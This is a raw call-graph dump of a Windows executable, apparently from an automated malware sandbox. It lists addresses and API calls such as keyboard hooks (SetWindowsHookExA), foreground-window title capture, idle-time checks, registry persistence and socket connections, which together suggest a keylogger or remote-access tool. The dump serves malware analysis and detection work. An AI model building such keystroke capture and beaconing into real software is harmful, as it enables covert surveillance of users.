46993->47399 46995 405cf4 46995->46661 46997 401efe 46996->46997 46999 401f0a 46997->46999 47408 4021b9 26 API calls 46997->47408 46999->46665 47002 4021b9 47000->47002 47001 4021e8 47001->46667 47002->47001 47409 40262e 26 API calls _Deallocate 47002->47409 47006 401ec9 47004->47006 47005 401ee4 47005->46675 47006->47005 47007 402325 28 API calls 47006->47007 47007->47005 47410 401e8f 47008->47410 47010 40bee1 CreateMutexA GetLastError 47010->46691 47412 41b366 47011->47412 47013 41a67c 47416 4125eb RegOpenKeyExA 47013->47416 47016 401eef 26 API calls 47017 41a6aa 47016->47017 47018 401eea 26 API calls 47017->47018 47020 41a6b2 47018->47020 47019 41a705 47019->46696 47020->47019 47021 4125eb 31 API calls 47020->47021 47022 41a6d8 47021->47022 47023 41a6e3 StrToIntA 47022->47023 47024 41a6f1 47023->47024 47025 41a6fa 47023->47025 47421 41c30d 28 API calls 47024->47421 47026 401eea 26 API calls 47025->47026 47026->47019 47029 40698f 47028->47029 47030 41258f 3 API calls 47029->47030 47031 406996 47030->47031 47031->46707 47031->46708 47033 41b027 47032->47033 47422 40b027 47033->47422 47035 41b02f 47035->46722 47037 401e27 47036->47037 47039 401e33 47037->47039 47431 402121 26 API calls 47037->47431 47039->46725 47042 402121 47040->47042 47041 402150 47041->46728 47042->47041 47432 402718 26 API calls _Deallocate 47042->47432 47045 412998 47044->47045 47046 406052 28 API calls 47045->47046 47047 4129ad 47046->47047 47048 401fbd 28 API calls 47047->47048 47049 4129bd 47048->47049 47050 4127aa 29 API calls 47049->47050 47051 4129c7 47050->47051 47052 401eea 26 API calls 47051->47052 47053 4129d4 47052->47053 47053->46774 47055 401f6e 47054->47055 47433 402301 47055->47433 47059 4127fa 47058->47059 47062 4127c3 47058->47062 47060 401eea 26 API calls 47059->47060 47061 40de0e 47060->47061 47061->46775 47063 4127d5 RegSetValueExA RegCloseKey 47062->47063 47063->47059 47065 43a810 _strftime 47064->47065 47437 439b4e 47065->47437 47069 41a942 47068->47069 47070 41a8a7 GetLocalTime 47068->47070 47072 401eea 26 API calls 47069->47072 47071 404cbf 28 API calls 47070->47071 47073 41a8e9 47071->47073 47074 41a94a 47072->47074 47075 405ce6 28 API calls 47073->47075 47076 401eea 26 API calls 47074->47076 47077 41a8f5 47075->47077 47078 40de7d 47076->47078 47471 4027cb 47077->47471 47078->46799 47080 41a901 47081 405ce6 28 API calls 47080->47081 47082 41a90d 47081->47082 47474 406478 76 API calls 47082->47474 47084 41a91b 47085 401eea 26 API calls 47084->47085 47086 41a927 47085->47086 47087 401eea 26 API calls 47086->47087 47088 41a930 47087->47088 47089 401eea 26 API calls 47088->47089 47090 41a939 47089->47090 47091 401eea 26 API calls 47090->47091 47091->47069 47093 409536 _wcslen 47092->47093 47094 409541 47093->47094 47095 409558 47093->47095 47096 40c89e 32 API calls 47094->47096 47097 40c89e 32 API calls 47095->47097 47099 409549 47096->47099 47098 409560 47097->47098 47100 401e18 26 API calls 47098->47100 47101 401e18 26 API calls 47099->47101 47102 40956e 47100->47102 47103 409553 47101->47103 47104 401e13 26 API calls 47102->47104 47106 401e13 26 API calls 47103->47106 47105 409576 47104->47105 47494 40856b 28 API calls 47105->47494 47108 4095ad 47106->47108 47479 409837 47108->47479 47110 409588 47495 4028cf 47110->47495 47113 409593 47114 401e18 26 API calls 47113->47114 47115 40959d 47114->47115 47116 401e13 26 API calls 47115->47116 47116->47103 47674 403b40 47117->47674 47121 41aa08 47122 4028cf 28 API calls 47121->47122 47123 41aa12 47122->47123 47124 401e13 26 API calls 47123->47124 47125 41aa1b 47124->47125 47126 401e13 26 API calls 47125->47126 47127 40e096 47126->47127 47127->46852 47129 412567 RegQueryValueExA RegCloseKey 47128->47129 47130 40e15e 47128->47130 47129->47130 47130->46880 47130->46883 47132 412688 RegQueryValueExW RegCloseKey 47131->47132 47133 4126b5 47131->47133 47132->47133 47134 403b40 28 API calls 47133->47134 47135 40e18d 47134->47135 47135->46895 47137 412a6a RegDeleteValueW 47136->47137 47138 412a7e 47136->47138 47137->47138 47139 412a7a 47137->47139 47138->46904 47139->46904 47141 40cbc5 47140->47141 47142 412546 3 API calls 47141->47142 47143 40cbcc 47142->47143 47144 40cbeb 47143->47144 47696 401602 47143->47696 47148 40cc37 47144->47148 47146 40cbd9 47699 4128ad RegCreateKeyA 47146->47699 47149 40cc4b 47148->47149 47150 412546 3 API calls 47149->47150 47151 40cc52 47150->47151 47152 40cc81 47151->47152 47153 40cc57 47151->47153 47157 41258f 3 API calls 47152->47157 47154 401602 27 API calls 47153->47154 47155 40cc5e 47154->47155 47716 43eadd 47155->47716 47159 40cc7f 47157->47159 47163 4140ac 47159->47163 47161 40cc6a 47162 4128ad 3 API calls 47161->47162 47162->47159 47164 4140c3 47163->47164 47753 41ac7e 47164->47753 47166 4140ce 47167 401d64 28 API calls 47166->47167 47168 4140e7 47167->47168 47169 43a7f7 _strftime 42 API calls 47168->47169 47170 4140f4 47169->47170 47171 414106 47170->47171 47172 4140f9 Sleep 47170->47172 47173 401f66 28 API calls 47171->47173 47172->47171 47174 414115 47173->47174 47175 401d64 28 API calls 47174->47175 47176 414123 47175->47176 47177 401fbd 28 API calls 47176->47177 47178 41412b 47177->47178 47179 41b1ce 28 API calls 47178->47179 47180 414133 47179->47180 47757 404262 WSAStartup 47180->47757 47182 41413d 47183 401d64 28 API calls 47182->47183 47184 414146 47183->47184 47185 401d64 28 API calls 47184->47185 47216 4141c5 47184->47216 47186 41415f 47185->47186 47189 401d64 28 API calls 47186->47189 47187 401d64 28 API calls 47187->47216 47188 401fbd 28 API calls 47188->47216 47190 414170 47189->47190 47192 401d64 28 API calls 47190->47192 47191 41b1ce 28 API calls 47191->47216 47193 414181 47192->47193 47195 401d64 28 API calls 47193->47195 47194 4085b4 28 API calls 47194->47216 47196 414192 47195->47196 47198 401d64 28 API calls 47196->47198 47197 401eef 26 API calls 47197->47216 47199 4141a3 47198->47199 47200 401d64 28 API calls 47199->47200 47201 4141b5 47200->47201 47889 404101 87 API calls 47201->47889 47204 41431c WSAGetLastError 47890 41be81 30 API calls 47204->47890 47209 414331 47211 41a891 79 API calls 47209->47211 47214 401d8c 26 API calls 47209->47214 47215 401d64 28 API calls 47209->47215 47209->47216 47217 43a7f7 _strftime 42 API calls 47209->47217 47254 401f66 28 API calls 47209->47254 47255 414cb4 CreateThread 47209->47255 47256 401eea 26 API calls 47209->47256 47257 401e13 26 API calls 47209->47257 47891 404c9e 28 API calls 47209->47891 47893 40a767 84 API calls 47209->47893 47894 4047eb 98 API calls 47209->47894 47211->47209 47213 404cbf 28 API calls 47213->47216 47214->47209 47215->47209 47216->47187 47216->47188 47216->47191 47216->47194 47216->47197 47216->47204 47216->47209 47216->47213 47218 405ce6 28 API calls 47216->47218 47220 4027cb 28 API calls 47216->47220 47221 401f66 28 API calls 47216->47221 47222 41a891 79 API calls 47216->47222 47223 401eea 26 API calls 47216->47223 47226 4082dc 28 API calls 47216->47226 47227 440e5e 26 API calls 47216->47227 47228 412735 3 API calls 47216->47228 47229 4125eb 31 API calls 47216->47229 47230 403b40 28 API calls 47216->47230 47231 41aff9 28 API calls 47216->47231 47233 41b0d3 28 API calls 47216->47233 47235 41af51 28 API calls 47216->47235 47236 401d64 28 API calls 47216->47236 47758 414072 47216->47758 47763 4041f1 47216->47763 47770 404915 47216->47770 47785 40428c connect 47216->47785 47845 41ab78 47216->47845 47848 41375b 47216->47848 47851 40cc9a 47216->47851 47857 40cbf1 47216->47857 47219 414d12 Sleep 47217->47219 47218->47216 47219->47209 47220->47216 47221->47216 47222->47216 47223->47216 47226->47216 47227->47216 47228->47216 47229->47216 47230->47216 47231->47216 47233->47216 47235->47216 47237 4145fa GetTickCount 47236->47237 47238 41af51 28 API calls 47237->47238 47251 414614 47238->47251 47240 41af51 28 API calls 47240->47251 47242 41b0d3 28 API calls 47242->47251 47245 40275c 28 API calls 47245->47251 47246 405ce6 28 API calls 47246->47251 47247 4027cb 28 API calls 47247->47251 47249 401eea 26 API calls 47249->47251 47250 401e13 26 API calls 47250->47251 47251->47240 47251->47242 47251->47245 47251->47246 47251->47247 47251->47249 47251->47250 47863 41aeab GetLastInputInfo GetTickCount 47251->47863 47864 41ae5d 47251->47864 47869 40e751 GetLocaleInfoA 47251->47869 47872 4027ec 28 API calls 47251->47872 47873 4045d5 47251->47873 47892 404468 60 API calls ctype 47251->47892 47254->47209 47255->47209 48055 41a07f 104 API calls 47255->48055 47256->47209 47257->47209 47258->46652 47259->46662 47262 4085c0 47261->47262 47263 402e78 28 API calls 47262->47263 47264 4085e4 47263->47264 47264->46683 47266 4125e3 47265->47266 47267 4125b9 RegQueryValueExA RegCloseKey 47265->47267 47266->46680 47267->47266 47268->46688 47269->46715 47270->46707 47271->46699 47272->46714 47274 40c8ba 47273->47274 47275 40c8da 47274->47275 47276 40c90f 47274->47276 47280 40c8d0 47274->47280 48056 41a956 29 API calls 47275->48056 47279 41b366 2 API calls 47276->47279 47278 40ca03 GetLongPathNameW 47282 403b40 28 API calls 47278->47282 47283 40c914 47279->47283 47280->47278 47281 40c8e3 47284 401e18 26 API calls 47281->47284 47285 40ca18 47282->47285 47286 40c918 47283->47286 47287 40c96a 47283->47287 47325 40c8ed 47284->47325 47289 403b40 28 API calls 47285->47289 47288 403b40 28 API calls 47286->47288 47290 403b40 28 API calls 47287->47290 47292 40c926 47288->47292 47293 40ca27 47289->47293 47291 40c978 47290->47291 47298 403b40 28 API calls 47291->47298 47299 403b40 28 API calls 47292->47299 48059 40cd0a 28 API calls 47293->48059 47294 401e13 26 API calls 47294->47280 47296 40ca3a 48060 402860 28 API calls 47296->48060 47301 40c98e 47298->47301 47302 40c93c 47299->47302 47300 40ca45 48061 402860 28 API calls 47300->48061 48058 402860 28 API calls 47301->48058 48057 402860 28 API calls 47302->48057 47306 40ca4f 47309 401e13 26 API calls 47306->47309 47307 40c999 47310 401e18 26 API calls 47307->47310 47308 40c947 47311 401e18 26 API calls 47308->47311 47312 40ca59 47309->47312 47313 40c9a4 47310->47313 47314 40c952 47311->47314 47315 401e13 26 API calls 47312->47315 47316 401e13 26 API calls 47313->47316 47317 401e13 26 API calls 47314->47317 47318 40ca62 47315->47318 47319 40c9ad 47316->47319 47320 40c95b 47317->47320 47321 401e13 26 API calls 47318->47321 47322 401e13 26 API calls 47319->47322 47323 401e13 26 API calls 47320->47323 47324 40ca6b 47321->47324 47322->47325 47323->47325 47326 401e13 26 API calls 47324->47326 47325->47294 47327 40ca74 47326->47327 47328 401e13 26 API calls 47327->47328 47329 40ca7d 47328->47329 47329->46760 47330->46772 47331->46795 47333 41275b RegQueryValueExA RegCloseKey 47332->47333 47334 41277f 47332->47334 47333->47334 47334->46753 47335->46787 47336->46823 47337->46834 47338->46856 47339->46845 47340->46879 47342 401e0c 47341->47342 47343->46706 47346 41a867 LoadResource LockResource SizeofResource 47345->47346 47347 40e25b 47345->47347 47346->47347 47347->46937 47349 401f8e 47348->47349 47355 402325 47349->47355 47351 401fa4 47351->46941 47353 401f86 28 API calls 47352->47353 47354 406066 47353->47354 47354->46948 47356 40232f 47355->47356 47358 40233a 47356->47358 47359 40294a 28 API calls 47356->47359 47358->47351 47359->47358 47361 40250d 47360->47361 47363 40252b 47361->47363 47364 40261a 28 API calls 47361->47364 47363->46952 47364->47363 47370 403c30 47365->47370 47368->46954 47369->46973 47371 403c39 47370->47371 47374 403c59 47371->47374 47375 403c68 47374->47375 47380 4032a4 47375->47380 47377 403c74 47378 402325 28 API calls 47377->47378 47379 403b73 47378->47379 47379->46954 47381 4032b0 47380->47381 47382 4032ad 47380->47382 47385 4032b6 28 API calls 47381->47385 47382->47377 47386->46977 47387->46981 47388->46983 47392 402e85 47390->47392 47391 402ea9 47391->46992 47392->47391 47393 402e98 47392->47393 47395 402eae 47392->47395 47397 403445 28 API calls 47393->47397 47395->47391 47398 40225b 26 API calls 47395->47398 47397->47391 47398->47391 47400 404bd0 47399->47400 47403 40245c 47400->47403 47402 404be4 47402->46995 47404 402469 47403->47404 47406 402478 47404->47406 47407 402ad3 28 API calls 47404->47407 47406->47402 47407->47406 47408->46999 47409->47001 47411 401e94 47410->47411 47413 41b373 GetCurrentProcess IsWow64Process 47412->47413 47414 41b38e 47412->47414 47413->47414 47415 41b38a 47413->47415 47414->47013 47415->47013 47417 412619 RegQueryValueExA RegCloseKey 47416->47417 47418 412641 47416->47418 47417->47418 47419 401f66 28 API calls 47418->47419 47420 412656 47419->47420 47420->47016 47421->47025 47423 40b02f 47422->47423 47426 40b04b 47423->47426 47425 40b045 47425->47035 47427 40b055 47426->47427 47429 40b060 47427->47429 47430 40b138 28 API calls 47427->47430 47429->47425 47430->47429 47431->47039 47432->47041 47434 40230d 47433->47434 47435 402325 28 API calls 47434->47435 47436 401f80 47435->47436 47436->46764 47455 43a755 47437->47455 47439 439b9b 47464 4394ee 38 API calls 3 library calls 47439->47464 47440 439b60 47440->47439 47441 439b75 47440->47441 47454 40de27 47440->47454 47462 445564 20 API calls _abort 47441->47462 47444 439b7a 47463 43aa37 26 API calls _Deallocate 47444->47463 47447 439ba7 47448 439bd6 47447->47448 47465 43a79a 42 API calls __Tolower 47447->47465 47451 439c42 47448->47451 47466 43a701 26 API calls 2 library calls 47448->47466 47467 43a701 26 API calls 2 library calls 47451->47467 47452 439d09 _strftime 47452->47454 47468 445564 20 API calls _abort 47452->47468 47454->46782 47454->46783 47456 43a75a 47455->47456 47457 43a76d 47455->47457 47469 445564 20 API calls _abort 47456->47469 47457->47440 47459 43a75f 47470 43aa37 26 API calls _Deallocate 47459->47470 47461 43a76a 47461->47440 47462->47444 47463->47454 47464->47447 47465->47447 47466->47451 47467->47452 47468->47454 47469->47459 47470->47461 47475 401e9b 47471->47475 47473 4027d9 47473->47080 47474->47084 47476 401ea7 47475->47476 47477 40245c 28 API calls 47476->47477 47478 401eb9 47477->47478 47478->47473 47480 409855 47479->47480 47481 41258f 3 API calls 47480->47481 47482 40985c 47481->47482 47483 409870 47482->47483 47484 40988a 47482->47484 47486 4095cf 47483->47486 47487 409875 47483->47487 47498 4082dc 47484->47498 47486->46818 47489 4082dc 28 API calls 47487->47489 47491 409883 47489->47491 47524 409959 29 API calls 47491->47524 47493 409888 47493->47486 47494->47110 47665 402d8b 47495->47665 47497 4028dd 47497->47113 47499 4082eb 47498->47499 47525 408431 47499->47525 47501 408309 47502 4098a5 47501->47502 47530 40affa 47502->47530 47505 4098f6 47507 401f66 28 API calls 47505->47507 47506 4098ce 47508 401f66 28 API calls 47506->47508 47509 409901 47507->47509 47510 4098d8 47508->47510 47512 401f66 28 API calls 47509->47512 47511 41b013 28 API calls 47510->47511 47513 4098e6 47511->47513 47514 409910 47512->47514 47534 40a876 31 API calls ___crtLCMapStringA 47513->47534 47516 41a891 79 API calls 47514->47516 47518 409915 CreateThread 47516->47518 47517 4098ed 47519 401eea 26 API calls 47517->47519 47520 409930 CreateThread 47518->47520 47521 40993c CreateThread 47518->47521 47540 4099a9 47518->47540 47519->47505 47520->47521 47546 409993 47520->47546 47522 401e13 26 API calls 47521->47522 47543 4099b5 47521->47543 47523 409950 47522->47523 47523->47486 47524->47493 47664 40999f 136 API calls 47524->47664 47526 40843d 47525->47526 47528 40845b 47526->47528 47529 402f0d 28 API calls 47526->47529 47528->47501 47529->47528 47532 40b006 47530->47532 47531 4098c3 47531->47505 47531->47506 47532->47531 47535 403b9e 47532->47535 47534->47517 47536 403ba8 47535->47536 47538 403bb3 47536->47538 47539 403cfd 28 API calls 47536->47539 47538->47531 47539->47538 47549 409e48 47540->47549 47594 40a3f4 47543->47594 47643 4099e4 47546->47643 47550 409e5d Sleep 47549->47550 47569 409d97 47550->47569 47552 4099b2 47553 409e9d CreateDirectoryW 47557 409e6f 47553->47557 47554 409eae GetFileAttributesW 47554->47557 47555 409ec5 SetFileAttributesW 47555->47557 47556 409f10 47559 409f3f PathFileExistsW 47556->47559 47562 401f86 28 API calls 47556->47562 47563 40a048 SetFileAttributesW 47556->47563 47564 406052 28 API calls 47556->47564 47565 401eef 26 API calls 47556->47565 47567 401eea 26 API calls 47556->47567 47568 401eea 26 API calls 47556->47568 47591 41b825 32 API calls 47556->47591 47592 41b892 CreateFileW SetFilePointer WriteFile CloseHandle 47556->47592 47557->47550 47557->47552 47557->47553 47557->47554 47557->47555 47557->47556 47560 401d64 28 API calls 47557->47560 47582 41b79a 47557->47582 47559->47556 47560->47557 47562->47556 47563->47557 47564->47556 47565->47556 47567->47556 47568->47557 47570 409e44 47569->47570 47574 409dad 47569->47574 47570->47557 47571 409dcc CreateFileW 47572 409dda GetFileSize 47571->47572 47571->47574 47573 409e0f CloseHandle 47572->47573 47572->47574 47573->47574 47574->47571 47574->47573 47575 409e21 47574->47575 47576 409e04 Sleep 47574->47576 47577 409dfd 47574->47577 47575->47570 47579 4082dc 28 API calls 47575->47579 47576->47573 47593 40a7f0 83 API calls 47577->47593 47580 409e3d 47579->47580 47581 4098a5 127 API calls 47580->47581 47581->47570 47583 41b7ad CreateFileW 47582->47583 47585 41b7e6 47583->47585 47586 41b7ea 47583->47586 47585->47557 47587 41b801 WriteFile 47586->47587 47588 41b7f1 SetFilePointer 47586->47588 47589 41b816 CloseHandle 47587->47589 47590 41b814 47587->47590 47588->47587 47588->47589 47589->47585 47590->47589 47591->47556 47592->47556 47593->47576 47596 40a402 47594->47596 47595 4099be 47596->47595 47597 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47596->47597 47602 41aeab GetLastInputInfo GetTickCount 47596->47602 47603 40a4a2 GetWindowTextW 47596->47603 47605 401e13 26 API calls 47596->47605 47606 40affa 28 API calls 47596->47606 47607 40a5ff 47596->47607 47609 40a569 Sleep 47596->47609 47612 401f66 28 API calls 47596->47612 47613 40a4f1 47596->47613 47617 4028cf 28 API calls 47596->47617 47618 405ce6 28 API calls 47596->47618 47620 409d58 27 API calls 47596->47620 47621 41b013 28 API calls 47596->47621 47622 401eea 26 API calls 47596->47622 47623 433724 5 API calls __Init_thread_wait 47596->47623 47624 433ab0 29 API calls __onexit 47596->47624 47625 4336da EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47596->47625 47626 4082a8 28 API calls 47596->47626 47628 40b0dd 28 API calls 47596->47628 47629 40ae58 44 API calls 2 library calls 47596->47629 47630 440e5e 47596->47630 47634 404c9e 28 API calls 47596->47634 47599 40b027 28 API calls 47597->47599 47599->47596 47602->47596 47603->47596 47605->47596 47606->47596 47608 401e13 26 API calls 47607->47608 47608->47595 47609->47596 47612->47596 47613->47596 47616 4082dc 28 API calls 47613->47616 47627 40a876 31 API calls ___crtLCMapStringA 47613->47627 47616->47613 47617->47596 47618->47596 47620->47596 47621->47596 47622->47596 47623->47596 47624->47596 47625->47596 47626->47596 47627->47613 47628->47596 47629->47596 47631 440e6a 47630->47631 47635 440c5a 47631->47635 47634->47596 47636 440c71 47635->47636 47640 440cb2 47636->47640 47641 445564 20 API calls _abort 47636->47641 47638 440ca8 47642 43aa37 26 API calls _Deallocate 47638->47642 47640->47596 47641->47638 47642->47640 47644 409a63 GetMessageA 47643->47644 47645 4099ff GetModuleHandleA SetWindowsHookExA 47643->47645 47646 409a75 TranslateMessage DispatchMessageA 47644->47646 47657 40999c 47644->47657 47645->47644 47647 409a1b GetLastError 47645->47647 47646->47644 47646->47657 47658 41af51 47647->47658 47651 409a3e 47652 401f66 28 API calls 47651->47652 47653 409a4d 47652->47653 47654 41a891 79 API calls 47653->47654 47655 409a52 47654->47655 47656 401eea 26 API calls 47655->47656 47656->47657 47659 440e5e 26 API calls 47658->47659 47660 41af72 47659->47660 47661 401f66 28 API calls 47660->47661 47662 409a31 47661->47662 47663 404c9e 28 API calls 47662->47663 47663->47651 47666 402d97 47665->47666 47669 4030f7 47666->47669 47668 402dab 47668->47497 47670 403101 47669->47670 47672 403115 47670->47672 47673 4036c2 28 API calls 47670->47673 47672->47668 47673->47672 47675 403b48 47674->47675 47681 403b7a 47675->47681 47678 403cbb 47685 403dc2 47678->47685 47680 403cc9 47680->47121 47682 403b86 47681->47682 47683 403b9e 28 API calls 47682->47683 47684 403b5a 47683->47684 47684->47678 47686 403dce 47685->47686 47689 402ffd 47686->47689 47688 403de3 47688->47680 47690 40300e 47689->47690 47691 4032a4 28 API calls 47690->47691 47692 40301a 47691->47692 47694 40302e 47692->47694 47695 4035e8 28 API calls 47692->47695 47694->47688 47695->47694 47702 4397ca 47696->47702 47700 4128ec 47699->47700 47701 4128c5 RegSetValueExA RegCloseKey 47699->47701 47700->47144 47701->47700 47705 43974b 47702->47705 47704 401608 47704->47146 47706 43975a 47705->47706 47707 43976e 47705->47707 47713 445564 20 API calls _abort 47706->47713 47712 43976a __alldvrm 47707->47712 47715 447811 11 API calls 2 library calls 47707->47715 47709 43975f 47714 43aa37 26 API calls _Deallocate 47709->47714 47712->47704 47713->47709 47714->47712 47715->47712 47724 4470cf GetLastError 47716->47724 47718 40cc64 47719 41a659 47718->47719 47750 43eabc 47719->47750 47722 43eabc 38 API calls 47723 41a66a 47722->47723 47723->47161 47725 4470e5 47724->47725 47726 4470f1 47724->47726 47745 447676 11 API calls 2 library calls 47725->47745 47746 448916 20 API calls 3 library calls 47726->47746 47729 4470eb 47729->47726 47731 44713a SetLastError 47729->47731 47730 4470fd 47732 447105 47730->47732 47747 4476cc 11 API calls 2 library calls 47730->47747 47731->47718 47735 446cd5 _free 20 API calls 47732->47735 47734 44711a 47734->47732 47737 447121 47734->47737 47736 44710b 47735->47736 47738 447146 SetLastError 47736->47738 47748 446f41 20 API calls _abort 47737->47748 47749 4455c6 38 API calls _abort 47738->47749 47740 44712c 47742 446cd5 _free 20 API calls 47740->47742 47744 447133 47742->47744 47744->47731 47744->47738 47745->47729 47746->47730 47747->47734 47748->47740 47751 4470cf _abort 38 API calls 47750->47751 47752 41a65f 47751->47752 47752->47722 47754 41acc4 ctype ___scrt_fastfail 47753->47754 47755 401f66 28 API calls 47754->47755 47756 41ad39 47755->47756 47756->47166 47757->47182 47759 414081 47758->47759 47760 41408b getaddrinfo WSASetLastError 47758->47760 47895 413f0f 35 API calls ___std_exception_copy 47759->47895 47760->47216 47762 414086 47762->47760 47764 404206 socket 47763->47764 47765 4041fd 47763->47765 47767 404220 47764->47767 47768 404224 CreateEventW 47764->47768 47896 404262 WSAStartup 47765->47896 47767->47216 47768->47216 47769 404202 47769->47764 47769->47767 47771 40492a 47770->47771 47772 4049b1 47770->47772 47773 404933 47771->47773 47774 404987 CreateEventA CreateThread 47771->47774 47775 404942 GetLocalTime 47771->47775 47772->47216 47773->47774 47774->47772 47898 404b1d 47774->47898 47776 41af51 28 API calls 47775->47776 47777 40495b 47776->47777 47897 404c9e 28 API calls 47777->47897 47779 404968 47780 401f66 28 API calls 47779->47780 47781 404977 47780->47781 47782 41a891 79 API calls 47781->47782 47783 40497c 47782->47783 47784 401eea 26 API calls 47783->47784 47784->47774 47786 4043e1 47785->47786 47787 4042b3 47785->47787 47788 4043e7 WSAGetLastError 47786->47788 47839 404343 47786->47839 47789 4042e8 47787->47789 47791 404cbf 28 API calls 47787->47791 47787->47839 47790 4043f7 47788->47790 47788->47839 47902 42035c 27 API calls 47789->47902 47792 4042f7 47790->47792 47793 4043fc 47790->47793 47795 4042d4 47791->47795 47798 401f66 28 API calls 47792->47798 47907 41be81 30 API calls 47793->47907 47799 401f66 28 API calls 47795->47799 47797 4042f0 47797->47792 47801 404306 47797->47801 47802 404448 47798->47802 47803 4042e3 47799->47803 47800 40440b 47908 404c9e 28 API calls 47800->47908 47808 404315 47801->47808 47809 40434c 47801->47809 47805 401f66 28 API calls 47802->47805 47806 41a891 79 API calls 47803->47806 47810 404457 47805->47810 47806->47789 47807 404418 47811 401f66 28 API calls 47807->47811 47812 401f66 28 API calls 47808->47812 47904 42113f 56 API calls 47809->47904 47813 41a891 79 API calls 47810->47813 47815 404427 47811->47815 47816 404324 47812->47816 47813->47839 47818 41a891 79 API calls 47815->47818 47819 401f66 28 API calls 47816->47819 47817 404354 47820 404389 47817->47820 47821 404359 47817->47821 47822 40442c 47818->47822 47823 404333 47819->47823 47906 4204f5 28 API calls 47820->47906 47825 401f66 28 API calls 47821->47825 47826 401eea 26 API calls 47822->47826 47828 41a891 79 API calls 47823->47828 47827 404368 47825->47827 47826->47839 47830 401f66 28 API calls 47827->47830 47831 404338 47828->47831 47829 404391 47832 4043be CreateEventW CreateEventW 47829->47832 47834 401f66 28 API calls 47829->47834 47833 404377 47830->47833 47903 41de20 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47831->47903 47832->47839 47835 41a891 79 API calls 47833->47835 47837 4043a7 47834->47837 47838 40437c 47835->47838 47840 401f66 28 API calls 47837->47840 47905 42079d 54 API calls 47838->47905 47839->47216 47842 4043b6 47840->47842 47843 41a891 79 API calls 47842->47843 47844 4043bb 47843->47844 47844->47832 47909 41ab50 GlobalMemoryStatusEx 47845->47909 47847 41ab8d 47847->47216 47910 41371e 47848->47910 47852 40ccbc ___scrt_fastfail 47851->47852 47853 412735 3 API calls 47852->47853 47854 40ccf2 47853->47854 47855 403b40 28 API calls 47854->47855 47856 40cd03 47855->47856 47856->47216 47858 40cc0d 47857->47858 47859 412546 3 API calls 47858->47859 47861 40cc14 47859->47861 47860 40cc2c 47860->47216 47861->47860 47862 41258f 3 API calls 47861->47862 47862->47860 47863->47251 47865 436260 ___scrt_fastfail 47864->47865 47866 41ae7c GetForegroundWindow GetWindowTextW 47865->47866 47867 403b40 28 API calls 47866->47867 47868 41aea6 47867->47868 47868->47251 47870 401f66 28 API calls 47869->47870 47871 40e776 47870->47871 47871->47251 47872->47251 47876 4045ec 47873->47876 47874 43aa9c ___crtLCMapStringA 21 API calls 47874->47876 47876->47874 47877 40465b 47876->47877 47878 401f86 28 API calls 47876->47878 47880 401eef 26 API calls 47876->47880 47882 401eea 26 API calls 47876->47882 47951 404688 47876->47951 47962 40455b 59 API calls 47876->47962 47877->47876 47879 404666 47877->47879 47878->47876 47963 4047eb 98 API calls 47879->47963 47880->47876 47882->47876 47883 40466d 47884 401eea 26 API calls 47883->47884 47885 404676 47884->47885 47886 401eea 26 API calls 47885->47886 47887 40467f 47886->47887 47887->47209 47889->47216 47890->47209 47891->47209 47892->47251 47893->47209 47894->47209 47895->47762 47896->47769 47897->47779 47901 404b29 101 API calls 47898->47901 47900 404b26 47901->47900 47902->47797 47903->47839 47904->47817 47905->47831 47906->47829 47907->47800 47908->47807 47909->47847 47913 4136f1 47910->47913 47914 413706 ___scrt_initialize_default_local_stdio_options 47913->47914 47917 43e4ed 47914->47917 47920 43b240 47917->47920 47921 43b280 47920->47921 47922 43b268 47920->47922 47921->47922 47924 43b288 47921->47924 47944 445564 20 API calls _abort 47922->47944 47946 4394ee 38 API calls 3 library calls 47924->47946 47925 43b26d 47945 43aa37 26 API calls _Deallocate 47925->47945 47928 43b298 47947 43b9c6 20 API calls 2 library calls 47928->47947 47929 43b278 47937 433f37 47929->47937 47932 413714 47932->47216 47933 43b310 47948 43c034 50 API calls 3 library calls 47933->47948 47935 43b31b 47949 43ba30 20 API calls _free 47935->47949 47938 433f42 IsProcessorFeaturePresent 47937->47938 47939 433f40 47937->47939 47941 4343b4 47938->47941 47939->47932 47950 434378 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47941->47950 47943 434497 47943->47932 47944->47925 47945->47929 47946->47928 47947->47933 47948->47935 47949->47929 47950->47943 47952 4046a3 47951->47952 47953 4047d8 47952->47953 47956 403b60 28 API calls 47952->47956 47957 401ebd 28 API calls 47952->47957 47958 401fbd 28 API calls 47952->47958 47960 401eef 26 API calls 47952->47960 47961 401eea 26 API calls 47952->47961 47954 401eea 26 API calls 47953->47954 47955 4047e1 47954->47955 47955->47877 47956->47952 47959 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 47957->47959 47958->47952 47959->47952 47964 414d2d 47959->47964 47960->47952 47961->47952 47962->47876 47963->47883 47965 401fbd 28 API calls 47964->47965 47966 414d4f SetEvent 47965->47966 47967 414d64 47966->47967 47968 403b60 28 API calls 47967->47968 47969 414d7e 47968->47969 47970 401fbd 28 API calls 47969->47970 47971 414d8e 47970->47971 47972 401fbd 28 API calls 47971->47972 47973 414da0 47972->47973 47974 41b1ce 28 API calls 47973->47974 47975 414da9 47974->47975 47976 4163cd 47975->47976 47978 414dc9 GetTickCount 47975->47978 47979 414f7e 47975->47979 47977 401d8c 26 API calls 47976->47977 47980 4163d6 47977->47980 47981 41af51 28 API calls 47978->47981 47979->47976 48038 414f2b 47979->48038 47982 401eea 26 API calls 47980->47982 47983 414ddf 47981->47983 47985 4163e2 47982->47985 48043 41aeab GetLastInputInfo GetTickCount 47983->48043 47988 401eea 26 API calls 47985->47988 47987 414f0f 47987->47976 47990 4163ee 47988->47990 47989 414de6 47991 41af51 28 API calls 47989->47991 47992 414df1 47991->47992 47993 41ae5d 30 API calls 47992->47993 47994 414dff 47993->47994 48044 41b0d3 47994->48044 47997 401d64 28 API calls 47998 414e1b 47997->47998 48048 4027ec 28 API calls 47998->48048 48000 414e29 48049 40275c 28 API calls 48000->48049 48002 414e38 48003 4027cb 28 API calls 48002->48003 48004 414e47 48003->48004 48050 40275c 28 API calls 48004->48050 48006 414e56 48007 4027cb 28 API calls 48006->48007 48008 414e62 48007->48008 48051 40275c 28 API calls 48008->48051 48010 414e6c 48052 404468 60 API calls ctype 48010->48052 48012 414e7b 48013 401eea 26 API calls 48012->48013 48014 414e84 48013->48014 48015 401eea 26 API calls 48014->48015 48016 414e90 48015->48016 48017 401eea 26 API calls 48016->48017 48018 414e9c 48017->48018 48019 401eea 26 API calls 48018->48019 48020 414ea8 48019->48020 